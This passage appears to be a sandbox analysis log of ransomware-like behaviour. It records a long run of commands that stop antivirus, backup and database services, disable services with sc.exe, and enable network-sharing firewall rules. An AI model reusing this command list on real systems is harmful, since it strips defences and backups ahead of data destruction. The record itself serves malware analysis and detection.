    "net.exe" start FDResPub /y
    3⤵
    PID:5140
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start FDResPub /y
      4⤵
      PID:4736
- - C:\Windows\system32\net.exe
    "net.exe" stop bedbg /y
    3⤵
    PID:4704
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop bedbg /y
      4⤵
      PID:5820
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:5068
- - C:\Windows\system32\sc.exe
    "sc.exe" config SSDPSRV start= auto
    3⤵
    PID:5000
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:4588
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SQL_2008 /y
    3⤵
    PID:3588
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
      4⤵
      PID:252
- - C:\Windows\system32\net.exe
    "net.exe" start SSDPSRV /y
    3⤵
    PID:6028
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start SSDPSRV /y
      4⤵
      PID:264
- - C:\Windows\system32\net.exe
    "net.exe" start upnphost /y
    3⤵
    PID:5956
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 start upnphost /y
      4⤵
      PID:5556
- - C:\Windows\system32\net.exe
    "net.exe" stop EhttpSrv /y
    3⤵
    PID:6116
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EhttpSrv /y
      4⤵
      PID:4084
- - C:\Windows\system32\net.exe
    "net.exe" stop MMS /y
    3⤵
    PID:5448
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MMS /y
      4⤵
      PID:5660
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SQLEXPRESS /y
    3⤵
    PID:5972
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
      4⤵
      PID:5744
- - C:\Windows\system32\net.exe
    "net.exe" stop ekrn /y
    3⤵
    PID:5256
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ekrn /y
      4⤵
      PID:5672
- - C:\Windows\system32\net.exe
    "net.exe" stop mozyprobackup /y
    3⤵
    PID:5740
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mozyprobackup /y
      4⤵
      PID:6108
- - C:\Windows\system32\net.exe
    "net.exe" stop PDVFSService /y
    3⤵
    PID:6032
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop PDVFSService /y
      4⤵
      PID:4592
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SYSTEM_BGC /y
    3⤵
    PID:6000
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
      4⤵
      PID:4584
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:4204
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
      4⤵
      PID:5300
- - C:\Windows\system32\net.exe
    "net.exe" stop EPSecurityService /y
    3⤵
    PID:5988
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EPSecurityService /y
      4⤵
      PID:4792
- - C:\Windows\system32\net.exe
    "net.exe" stop ESHASRV /y
    3⤵
    PID:4124
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ESHASRV /y
      4⤵
      PID:2644
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop macmnsvc /y
        5⤵
        
        PID:4740
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:4796
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
      4⤵
      PID:3972
- - C:\Windows\system32\net.exe
    "net.exe" stop SDRSVC /y
    3⤵
    PID:5224
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SDRSVC /y
      4⤵
      PID:4016
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$VEEAMSQL2012 /y
    3⤵
    PID:4436
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
      4⤵
      PID:4804
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$TPS /y
    3⤵
    PID:4932
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$TPS /y
      4⤵
      PID:4428
- - C:\Windows\system32\net.exe
    "net.exe" stop FA_Scheduler /y
    3⤵
    PID:4956
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop FA_Scheduler /y
      4⤵
      PID:4156
- - C:\Windows\system32\net.exe
    "net.exe" stop EPUpdateService /y
    3⤵
    PID:4568
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EPUpdateService /y
      4⤵
      PID:5488
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:2084
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
      4⤵
      PID:4412
- - C:\Windows\system32\net.exe
    "net.exe" stop ntrtscan /y
    3⤵
    PID:4532
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ntrtscan /y
      4⤵
      PID:4208
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
    3⤵
    PID:4988
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
      4⤵
      PID:4380
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$TPSAMA /y
    3⤵
    PID:3224
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
      4⤵
      PID:6052
- - C:\Windows\system32\net.exe
    "net.exe" stop avpsus /y
    3⤵
    PID:4968
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop avpsus /y
      4⤵
      PID:5216
- - C:\Windows\system32\net.exe
    "net.exe" stop KAVFS /y
    3⤵
    PID:4112
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop KAVFS /y
      4⤵
      PID:6044
- - C:\Windows\system32\net.exe
    "net.exe" stop EsgShKernel /y
    3⤵
    PID:4560
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EsgShKernel /y
      4⤵
      PID:4772
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLWriter /y
    3⤵
    PID:6020
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLWriter /y
      4⤵
      PID:468
- - C:\Windows\system32\net.exe
    "net.exe" stop McAfeeDLPAgentService /y
    3⤵
    PID:4696
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
      4⤵
      PID:1524
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamBrokerSvc /y
    3⤵
    PID:5200
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamBrokerSvc /y
      4⤵
      PID:4712
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
    3⤵
    PID:5148
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
      4⤵
      PID:4216
- - C:\Windows\system32\net.exe
    "net.exe" stop mfewc /y
    3⤵
    PID:4832
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfewc /y
      4⤵
      PID:5892
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
      4⤵
      PID:3224
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
    3⤵
    PID:248
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
      4⤵
      PID:4884
- - C:\Windows\system32\net.exe
    "net.exe" stop KAVFSGT /y
    3⤵
    PID:4472
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop KAVFSGT /y
      4⤵
      PID:5592
- - C:\Windows\system32\net.exe
    "net.exe" stop BMR Boot Service /y
    3⤵
    PID:5568
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BMR Boot Service /y
      4⤵
      PID:5844
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
      4⤵
      PID:4792
- - C:\Windows\system32\net.exe
    "net.exe" stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:5952
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
      4⤵
      PID:4220
- - C:\Windows\system32\net.exe
    "net.exe" stop klnagent /y
    3⤵
    PID:5660
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop klnagent /y
      4⤵
      PID:5700
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamBackupSvc /y
    3⤵
    PID:5912
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamBackupSvc /y
      4⤵
      PID:4232
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamCatalogSvc /y
    3⤵
    PID:5016
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamCatalogSvc /y
      4⤵
      PID:5972
- - C:\Windows\system32\net.exe
    "net.exe" stop DefWatch /y
    3⤵
    PID:4868
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop DefWatch /y
      4⤵
      PID:4348
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
    3⤵
    PID:6096
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
      4⤵
      PID:4036
- - C:\Windows\system32\net.exe
    "net.exe" stop ccEvtMgr /y
    3⤵
    PID:5300
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ccEvtMgr /y
      4⤵
      PID:4160
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:4340
- - C:\Windows\system32\net.exe
    "net.exe" stop ccSetMgr /y
    3⤵
    PID:4044
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ccSetMgr /y
      4⤵
      PID:4452
- - C:\Windows\system32\net.exe
    "net.exe" stop kavfsslp /y
    3⤵
    PID:4496
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop kavfsslp /y
      4⤵
      PID:4440
- - C:\Windows\system32\net.exe
    "net.exe" stop macmnsvc /y
    3⤵
    PID:2644
- - C:\Windows\system32\net.exe
    "net.exe" stop SavRoam /y
    3⤵
    PID:4300
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SavRoam /y
      4⤵
      PID:4804
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamCloudSvc /y
    3⤵
    PID:5332
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamCloudSvc /y
      4⤵
      PID:5336
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLServerADHelper /y
    3⤵
    PID:4176
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper /y
      4⤵
      PID:4756
- - C:\Windows\system32\net.exe
    "net.exe" stop RTVscan /y
    3⤵
    PID:4276
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop RTVscan /y
      4⤵
      PID:4488
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$TPS /y
    3⤵
    PID:5060
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
      4⤵
      PID:4332
- - C:\Windows\system32\net.exe
    "net.exe" stop McAfeeEngineService /y
    3⤵
    PID:5528
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeEngineService /y
      4⤵
      PID:5272
- - C:\Windows\system32\net.exe
    "net.exe" stop QBFCService /y
    3⤵
    PID:5596
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop QBFCService /y
      4⤵
      PID:3692
- - C:\Windows\system32\net.exe
    "net.exe" stop masvc /y
    3⤵
    PID:5376
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop masvc /y
      4⤵
      PID:4100
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamHvIntegrationSvc /y
    3⤵
    PID:5772
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
      4⤵
      PID:4384
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamDeploymentService /y
    3⤵
    PID:5496
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploymentService /y
      4⤵
      PID:4576
- - C:\Windows\system32\net.exe
    "net.exe" stop QBIDPService /y
    3⤵
    PID:5080
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop QBIDPService /y
      4⤵
      PID:5076
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLServerADHelper100 /y
    3⤵
    PID:1000
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
      4⤵
      PID:468
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLFDLauncher$TPSAMA /y
    3⤵
    PID:5168
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
      4⤵
      PID:5128
- - C:\Windows\system32\net.exe
    "net.exe" stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:4892
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
      4⤵
      PID:4712
- - C:\Windows\system32\net.exe
    "net.exe" stop McAfeeFramework /y
    3⤵
    PID:1524
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeFramework /y
      4⤵
      PID:4520
- - C:\Windows\system32\net.exe
    "net.exe" stop QBCFMonitorService /y
    3⤵
    PID:5668
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop QBCFMonitorService /y
      4⤵
      PID:5068
- - C:\Windows\system32\net.exe
    "net.exe" stop MBAMService /y
    3⤵
    PID:5312
- - C:\Windows\system32\net.exe
    "net.exe" stop YooBackup /y
    3⤵
    PID:5832
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop YooBackup /y
      4⤵
      PID:5672
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EraserSvc11710 /y
      4⤵
      PID:4220
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamDeploySvc /y
    3⤵
    PID:4876
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploySvc /y
      4⤵
      PID:5524
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamMountSvc /y
    3⤵
    PID:2740
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLServerOLAPService /y
    3⤵
    PID:4220
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
      4⤵
      PID:800
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLSERVER /y
    3⤵
    PID:4024
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLSERVER /y
      4⤵
      PID:5900
- - C:\Windows\system32\net.exe
    "net.exe" stop YooIT /y
    3⤵
    PID:3700
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop YooIT /y
      4⤵
      PID:6068
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SAVService /y
        5⤵
        
        PID:4232
- - C:\Windows\system32\net.exe
    "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
    3⤵
    PID:3092
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
      4⤵
      PID:4232
- - C:\Windows\system32\net.exe
    "net.exe" stop MBEndpointAgent /y
    3⤵
    PID:1844
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MBEndpointAgent /y
      4⤵
      PID:348
- - C:\Windows\system32\net.exe
    "net.exe" stop zhudongfangyu /y
    3⤵
    PID:2772
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop zhudongfangyu /y
      4⤵
      PID:1068
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamNFSSvc /y
    3⤵
    PID:4956
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamNFSSvc /y
      4⤵
      PID:4472
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecJobEngine /y
    3⤵
    PID:4184
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecJobEngine /y
      4⤵
      PID:5224
- - C:\Windows\system32\net.exe
    "net.exe" stop MySQL57 /y
    3⤵
    PID:4188
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MySQL57 /y
      4⤵
      PID:2520
- - C:\Windows\system32\net.exe
    "net.exe" stop stc_raw_agent /y
    3⤵
    PID:5940
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop stc_raw_agent /y
      4⤵
      PID:5860
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecManagementService /y
    3⤵
    PID:4744
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecManagementService /y
      4⤵
      PID:2192
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamEnterpriseManagerSvc /y
    3⤵
    PID:5568
- - C:\Windows\system32\net.exe
    "net.exe" stop McShield /y
    3⤵
    PID:1776
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McShield /y
      4⤵
      PID:4740
- - C:\Windows\system32\net.exe
    "net.exe" stop mfefire /y
    3⤵
    PID:4828
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfefire /y
      4⤵
      PID:5724
- - C:\Windows\system32\net.exe
    "net.exe" stop VSNAPVSS /y
    3⤵
    PID:988
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VSNAPVSS /y
      4⤵
      PID:4756
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecRPCService /y
    3⤵
    PID:4652
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecRPCService /y
      4⤵
      PID:5144
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamRESTSvc /y
    3⤵
    PID:3972
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamRESTSvc /y
      4⤵
      PID:4800
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamTransportSvc /y
    3⤵
    PID:4288
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamTransportSvc /y
      4⤵
      PID:5272
- - C:\Windows\system32\net.exe
    "net.exe" stop MySQL80 /y
    3⤵
    PID:4208
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MySQL80 /y
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4008
- - C:\Windows\system32\net.exe
    "net.exe" stop wbengine /y
    3⤵
    PID:4108
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$SQL_2008 /y
    3⤵
    PID:4920
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
      4⤵
      PID:4840
- - C:\Windows\system32\net.exe
    "net.exe" stop AcrSch2Svc /y
    3⤵
    PID:4552
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AcrSch2Svc /y
      4⤵
      PID:3152
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
        5⤵
        
        PID:5264
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamDeploymentService /y
    3⤵
    PID:5264
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploymentService /y
      4⤵
      PID:4836
- - C:\Windows\system32\net.exe
    "net.exe" stop AcronisAgent /y
    3⤵
    PID:4852
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AcronisAgent /y
      4⤵
      PID:5932
- - C:\Windows\system32\net.exe
    "net.exe" stop mfemms /y
    3⤵
    PID:5364
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfemms /y
      4⤵
      PID:5064
- - C:\Windows\system32\net.exe
    "net.exe" stop McTaskManager /y
    3⤵
    PID:4908
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamNFSSvc /y
    3⤵
    PID:5848
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamNFSSvc /y
      4⤵
      PID:6064
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamTransportSvc /y
    3⤵
    PID:4660
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamTransportSvc /y
      4⤵
      PID:4328
- - C:\Windows\system32\net.exe
    "net.exe" stop wbengine /y
    3⤵
    PID:4216
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop wbengine /y
      4⤵
      PID:5664
- - C:\Windows\system32\net.exe
    "net.exe" stop CASAD2DWebSvc /y
    3⤵
    PID:4884
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop CASAD2DWebSvc /y
      4⤵
      PID:4548
- - C:\Windows\system32\net.exe
    "net.exe" stop OracleClientCache80 /y
    3⤵
    PID:4468
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop OracleClientCache80 /y
      4⤵
      PID:5588
- - C:\Windows\system32\net.exe
    "net.exe" stop veeam /y
    3⤵
    PID:5000
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop veeam /y
      4⤵
      PID:5448
- - C:\Windows\system32\net.exe
    "net.exe" stop RESvc /y
    3⤵
    PID:4640
- - C:\Windows\system32\net.exe
    "net.exe" stop CAARCUpdateSvc /y
    3⤵
    PID:2400
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop CAARCUpdateSvc /y
      4⤵
      PID:5996
- - C:\Windows\system32\net.exe
    "net.exe" stop sophos /y
    3⤵
    PID:5160
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sophos /y
      4⤵
      PID:1580
- - C:\Windows\system32\net.exe
    "net.exe" stop mfevtp /y
    3⤵
    PID:5812
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfevtp /y
      4⤵
      PID:5176
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$PRACTTICEBGC /y
    3⤵
    PID:5096
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
      4⤵
      PID:4404
- - C:\Windows\system32\net.exe
    "net.exe" stop PDVFSService /y
    3⤵
    PID:5472
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop PDVFSService /y
      4⤵
      PID:348
- - C:\Windows\system32\net.exe
    "net.exe" stop sms_site_sql_backup /y
    3⤵
    PID:4204
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sms_site_sql_backup /y
      4⤵
      PID:5720
- - C:\Windows\system32\net.exe
    "net.exe" stop SepMasterService /y
    3⤵
    PID:4796
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SepMasterService /y
      4⤵
      PID:5384
- - C:\Windows\system32\net.exe
    "net.exe" stop “Acronis VSS Provider” /y
    3⤵
    PID:4832
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecVSSProvider /y
    3⤵
    PID:5988
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecVSSProvider /y
      4⤵
      PID:6020
- - C:\Windows\system32\net.exe
    "net.exe" stop MsDtsServer /y
    3⤵
    PID:4020
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer /y
      4⤵
      PID:6004
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$BKUPEXEC /y
    3⤵
    PID:5016
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
      4⤵
      PID:4444
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$PRACTTICEMGT /y
    3⤵
    PID:4036
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
      4⤵
      PID:4808
- - C:\Windows\system32\net.exe
    "net.exe" stop IISAdmin /y
    3⤵
    PID:4888
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop IISAdmin /y
      4⤵
      PID:2272
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SOPHOS /y
    3⤵
    PID:2756
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
      4⤵
      PID:4784
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecAgentAccelerator /y
    3⤵
    PID:1112
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
      4⤵
      PID:4264
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecAgentBrowser /y
    3⤵
    PID:2188
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
      4⤵
      PID:5828
- - C:\Windows\system32\net.exe
    "net.exe" stop ShMonitor /y
    3⤵
    PID:4428
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ShMonitor /y
      4⤵
      PID:2256
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeES /y
    3⤵
    PID:5752
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeES /y
      4⤵
      PID:572
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
    3⤵
    PID:5204
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
      4⤵
      PID:5020
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$PROD /y
    3⤵
    PID:4380
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PROD /y
      4⤵
      PID:468
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecDiveciMediaService /y
    3⤵
    PID:4332
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
      4⤵
      PID:272
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
    3⤵
    PID:5564
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Agent” /y
    3⤵
    PID:2680
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Agent” /y
      4⤵
      PID:5688
- - C:\Windows\system32\net.exe
    "net.exe" stop sacsvr /y
    3⤵
    PID:4716
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sacsvr /y
      4⤵
      PID:5520
- - C:\Windows\system32\net.exe
    "net.exe" stop “Enterprise Client Service” /y
    3⤵
    PID:5088
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Enterprise Client Service” /y
      4⤵
      PID:4508
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$CXDB /y
    3⤵
    PID:2772
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$CXDB /y
      4⤵
      PID:4876
- - C:\Windows\system32\net.exe
    "net.exe" stop “SQL Backups /y
    3⤵
    PID:5060
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “SQL Backups /y
      4⤵
      PID:4680
- - C:\Windows\system32\net.exe
    "net.exe" stop Smcinst /y
    3⤵
    PID:5668
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop Smcinst /y
      4⤵
      PID:4828
- - C:\Windows\system32\net.exe
    "net.exe" stop EraserSvc11710 /y
    3⤵
    PID:5832
- - C:\Windows\system32\net.exe
    "net.exe" stop msftesql$PROD /y
    3⤵
    PID:4924
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop msftesql$PROD /y
      4⤵
      PID:4432
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
    3⤵
    PID:4200
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
      4⤵
      PID:5180
- - C:\Windows\system32\net.exe
    "net.exe" stop SAVAdminService /y
    3⤵
    PID:6032
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SAVAdminService /y
      4⤵
      PID:5984
- - C:\Windows\system32\net.exe
    "net.exe" stop NetMsmqActivator /y
    3⤵
    PID:5896
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop NetMsmqActivator /y
      4⤵
      PID:4900
- - C:\Windows\system32\net.exe
    "net.exe" stop SmcService /y
    3⤵
    PID:5744
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SmcService /y
      4⤵
      PID:4168
- - C:\Windows\system32\net.exe
    "net.exe" stop MsDtsServer100 /y
    3⤵
    PID:4632
- - C:\Windows\system32\net.exe
    "net.exe" stop SstpSvc /y
    3⤵
    PID:5908
